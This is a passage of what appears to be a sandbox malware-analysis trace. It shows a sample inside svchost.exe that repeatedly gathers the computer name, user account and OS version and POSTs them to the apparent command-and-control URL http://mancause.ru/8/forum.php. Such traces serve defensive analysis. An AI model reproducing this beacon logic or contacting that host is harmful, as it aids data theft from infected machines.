application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x14e3d4*, dwOptionalLength=0x79) returned 1 [0239.179] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14e3a0, lpdwBufferLength=0x14e388, lpdwIndex=0x0 | out: lpBuffer=0x14e3a0*, lpdwBufferLength=0x14e388*=0x4, lpdwIndex=0x0) returned 1 [0239.179] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2240020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x14fd28 | out: lpBuffer=0x2240020*, lpdwNumberOfBytesRead=0x14fd28*=0xc) returned 1 [0239.179] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0239.179] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0239.179] Sleep (dwMilliseconds=0xea60) [0249.181] Sleep (dwMilliseconds=0xea60) [0259.220] GetVersion () returned 0x1db10106 [0259.221] GetComputerNameA (in: lpBuffer=0x14e2c0, nSize=0x14e3c4 | out: lpBuffer="Q9IATRKPRH", nSize=0x14e3c4) returned 1 [0259.221] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0259.221] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0259.221] K32EnumProcesses (in: lpidProcess=0x14ce80, cb=0x1000, lpcbNeeded=0x14df88 | out: lpidProcess=0x14ce80, lpcbNeeded=0x14df88) returned 1 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0259.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0259.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c0) returned 0x0 [0259.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0259.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0259.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0259.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x170 [0259.226] K32GetProcessImageFileNameA (in: hProcess=0x170, lpImageFileName=0x14cd5c, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0259.226] CloseHandle (hObject=0x170) returned 1 [0259.226] lstrcpyA (in: lpString1=0x14de80, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0259.226] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0259.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x170 [0259.227] OpenProcessToken (in: ProcessHandle=0x170, DesiredAccess=0x20008, TokenHandle=0x14df74 | out: TokenHandle=0x14df74*=0x198) returned 1 [0259.227] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14df7c | out: TokenInformation=0x0, ReturnLength=0x14df7c) returned 0 [0259.227] GetLastError () returned 0x7a [0259.227] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x656510 [0259.227] GetTokenInformation (in: TokenHandle=0x198, TokenInformationClass=0x1, TokenInformation=0x656510, TokenInformationLength=0x24, ReturnLength=0x14df7c | out: TokenInformation=0x656510, ReturnLength=0x14df7c) returned 1 [0259.228] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x656518*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x14df9c, cchName=0x14df90, ReferencedDomainName=0x14e0a0, cchReferencedDomainName=0x14df98, peUse=0x14df64 | out: Name="kEecfMwgj", cchName=0x14df90, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x14df98, peUse=0x14df64) returned 1 [0259.231] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x656510 | out: hHeap=0x5d0000) returned 1 [0259.231] lstrcpyA (in: lpString1=0x14e1bc, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0259.231] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0259.231] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0259.231] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0259.231] lstrcpyA (in: lpString1=0x14fcd4, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0259.231] DsEnumerateDomainTrustsA () returned 0x6b5 [0259.238] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77350000 [0259.239] GetProcAddress (hModule=0x77350000, lpProcName="GetNativeSystemInfo") returned 0x773710b5 [0259.239] GetNativeSystemInfo (in: lpSystemInfo=0x14e3a0 | out: lpSystemInfo=0x14e3a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0259.239] wsprintfA (in: param_1=0x14e3d4, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0259.239] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0259.239] lstrlenA (lpString="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0259.239] InternetCrackUrlA (in: lpszUrl="http://mancause.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14e34c | out: lpUrlComponents=0x14e34c) returned 1 [0259.240] InternetConnectA (hInternet=0xcc0004, lpszServerName="mancause.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0259.243] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0259.244] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x14e3d4*, dwOptionalLength=0x79) returned 1 [0259.322] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14e3a0, lpdwBufferLength=0x14e388, lpdwIndex=0x0 | out: lpBuffer=0x14e3a0*, lpdwBufferLength=0x14e388*=0x4, lpdwIndex=0x0) returned 1 [0259.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2240020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x14fd28 | out: lpBuffer=0x2240020*, lpdwNumberOfBytesRead=0x14fd28*=0xc) returned 1 [0259.322] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0259.324] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0259.324] Sleep (dwMilliseconds=0xea60) [0269.336] Sleep (dwMilliseconds=0xea60) [0280.741] GetVersion () returned 0x1db10106 [0280.742] GetComputerNameA (in: lpBuffer=0x14e2c0, nSize=0x14e3c4 | out: lpBuffer="Q9IATRKPRH", nSize=0x14e3c4) returned 1 [0280.742] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0280.742] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0280.742] K32EnumProcesses (in: lpidProcess=0x14ce80, cb=0x1000, lpcbNeeded=0x14df88 | out: lpidProcess=0x14ce80, lpcbNeeded=0x14df88) returned 1 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c0) returned 0x0 [0280.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0280.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0280.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0280.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x278 [0280.749] K32GetProcessImageFileNameA (in: hProcess=0x278, lpImageFileName=0x14cd5c, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0280.749] CloseHandle (hObject=0x278) returned 1 [0280.749] lstrcpyA (in: lpString1=0x14de80, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0280.749] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0280.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x278 [0280.750] OpenProcessToken (in: ProcessHandle=0x278, DesiredAccess=0x20008, TokenHandle=0x14df74 | out: TokenHandle=0x14df74*=0x288) returned 1 [0280.750] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14df7c | out: TokenInformation=0x0, ReturnLength=0x14df7c) returned 0 [0280.750] GetLastError () returned 0x7a [0280.750] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x656330 [0280.750] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x1, TokenInformation=0x656330, TokenInformationLength=0x24, ReturnLength=0x14df7c | out: TokenInformation=0x656330, ReturnLength=0x14df7c) returned 1 [0280.750] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x656338*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x14df9c, cchName=0x14df90, ReferencedDomainName=0x14e0a0, cchReferencedDomainName=0x14df98, peUse=0x14df64 | out: Name="kEecfMwgj", cchName=0x14df90, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x14df98, peUse=0x14df64) returned 1 [0280.752] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x656330 | out: hHeap=0x5d0000) returned 1 [0280.752] lstrcpyA (in: lpString1=0x14e1bc, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0280.752] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0280.752] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0280.752] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0280.752] lstrcpyA (in: lpString1=0x14fcd4, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0280.752] DsEnumerateDomainTrustsA () returned 0x6b5 [0280.758] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77350000 [0280.758] GetProcAddress (hModule=0x77350000, lpProcName="GetNativeSystemInfo") returned 0x773710b5 [0280.758] GetNativeSystemInfo (in: lpSystemInfo=0x14e3a0 | out: lpSystemInfo=0x14e3a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0280.759] wsprintfA (in: param_1=0x14e3d4, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0280.759] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0280.759] lstrlenA (lpString="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0280.759] InternetCrackUrlA (in: lpszUrl="http://mancause.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14e34c | out: lpUrlComponents=0x14e34c) returned 1 [0280.759] InternetConnectA (hInternet=0xcc0004, lpszServerName="mancause.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0280.760] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0280.761] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x14e3d4*, dwOptionalLength=0x79) returned 1 [0280.943] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14e3a0, lpdwBufferLength=0x14e388, lpdwIndex=0x0 | out: lpBuffer=0x14e3a0*, lpdwBufferLength=0x14e388*=0x4, lpdwIndex=0x0) returned 1 [0280.943] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2240020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x14fd28 | out: lpBuffer=0x2240020*, lpdwNumberOfBytesRead=0x14fd28*=0xc) returned 1 [0280.943] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0280.944] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0280.944] Sleep (dwMilliseconds=0xea60) [0292.065] Sleep (dwMilliseconds=0xea60) [0302.085] GetVersion () returned 0x1db10106 [0302.086] GetComputerNameA (in: lpBuffer=0x14e2c0, nSize=0x14e3c4 | out: lpBuffer="Q9IATRKPRH", nSize=0x14e3c4) returned 1 [0302.086] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0302.086] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0302.086] K32EnumProcesses (in: lpidProcess=0x14ce80, cb=0x1000, lpcbNeeded=0x14df88 | out: lpidProcess=0x14ce80, lpcbNeeded=0x14df88) returned 1 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c0) returned 0x0 [0302.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0302.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0302.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0302.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x328 [0302.090] K32GetProcessImageFileNameA (in: hProcess=0x328, lpImageFileName=0x14cd5c, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0302.090] CloseHandle (hObject=0x328) returned 1 [0302.091] lstrcpyA (in: lpString1=0x14de80, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0302.091] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0302.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x328 [0302.091] OpenProcessToken (in: ProcessHandle=0x328, DesiredAccess=0x20008, TokenHandle=0x14df74 | out: TokenHandle=0x14df74*=0x310) returned 1 [0302.092] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14df7c | out: TokenInformation=0x0, ReturnLength=0x14df7c) returned 0 [0302.092] GetLastError () returned 0x7a [0302.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x656510 [0302.092] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x1, TokenInformation=0x656510, TokenInformationLength=0x24, ReturnLength=0x14df7c | out: TokenInformation=0x656510, ReturnLength=0x14df7c) returned 1 [0302.092] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x656518*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x14df9c, cchName=0x14df90, ReferencedDomainName=0x14e0a0, cchReferencedDomainName=0x14df98, peUse=0x14df64 | out: Name="kEecfMwgj", cchName=0x14df90, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x14df98, peUse=0x14df64) returned 1 [0302.095] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x656510 | out: hHeap=0x5d0000) returned 1 [0302.095] lstrcpyA (in: lpString1=0x14e1bc, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0302.095] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0302.095] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0302.095] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0302.095] lstrcpyA (in: lpString1=0x14fcd4, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0302.095] DsEnumerateDomainTrustsA () returned 0x6b5 [0302.101] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77350000 [0302.107] GetProcAddress (hModule=0x77350000, lpProcName="GetNativeSystemInfo") returned 0x773710b5 [0302.107] GetNativeSystemInfo (in: lpSystemInfo=0x14e3a0 | out: lpSystemInfo=0x14e3a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0302.107] wsprintfA (in: param_1=0x14e3d4, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0302.107] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0302.107] lstrlenA (lpString="GUID=9530606989129575584&BUILD=0607_qxwd0&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0302.107] InternetCrackUrlA (in: lpszUrl="http://mancause.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x14e34c | out: lpUrlComponents=0x14e34c) returned 1 [0302.108] InternetConnectA (hInternet=0xcc0004, lpszServerName="mancause.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0302.111] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x64f47048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0302.111] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x14e3d4*, dwOptionalLength=0x79) returned 1 [0302.188] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x14e3a0, lpdwBufferLength=0x14e388, lpdwIndex=0x0 | out: lpBuffer=0x14e3a0*, lpdwBufferLength=0x14e388*=0x4, lpdwIndex=0x0) returned 1 [0302.188] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2240020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x14fd28 | out: lpBuffer=0x2240020*, lpdwNumberOfBytesRead=0x14fd28*=0xc) returned 1 [0302.188] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0302.188] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0302.188] Sleep (dwMilliseconds=0xea60) [0312.190] Sleep (dwMilliseconds=0xea60) Thread: id = 75 os_tid = 0xf4c Thread: id = 76 os_tid = 0xf50 Thread: id = 77 os_tid = 0xf54 Thread: id = 78 os_tid = 0xf58 Thread: id = 79 os_tid = 0xf5c Thread: id = 97 os_tid = 0x128 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0xd63a000" os_pid = "0xf74" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xf04" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe" cur_dir = "C:\\Users\\kEecfMwgj\\Documents\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e32c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 80 os_tid = 0xf78 [0219.086] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27fc78 | out: lpSystemTimeAsFileTime=0x27fc78*(dwLowDateTime=0xa996cba0, dwHighDateTime=0x1d772da)) [0219.086] GetCurrentProcessId () returned 0xf74 [0219.086] GetCurrentThreadId () returned 0xf78 [0219.086] GetTickCount () returned 0x1f1afde [0219.086] QueryPerformanceCounter (in: lpPerformanceCount=0x27fc80 | out: lpPerformanceCount=0x27fc80*=3279383552752) returned 1 [0219.086] GetStartupInfoA (in: lpStartupInfo=0x27fc4c | out: lpStartupInfo=0x27fc4c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\svchost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0219.086] __set_app_type (_Type=0x2) [0219.086] __p__fmode () returned 0x766931f4 [0219.092] __getmainargs (in: _Argc=0x444018, _Argv=0x444014, _Env=0x444010, _DoWildCard=-1, _StartInfo=0x444000 | out: _Argc=0x444018, _Argv=0x444014, _Env=0x444010) returned 0 [0219.093] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x435640) returned 0x0 [0219.096] __p__acmdln () returned 0x766904d8*="C:\\Windows\\SysWOW64\\svchost.exe" [0219.096] malloc (_Size=0x8) returned 0x911b8 [0219.096] 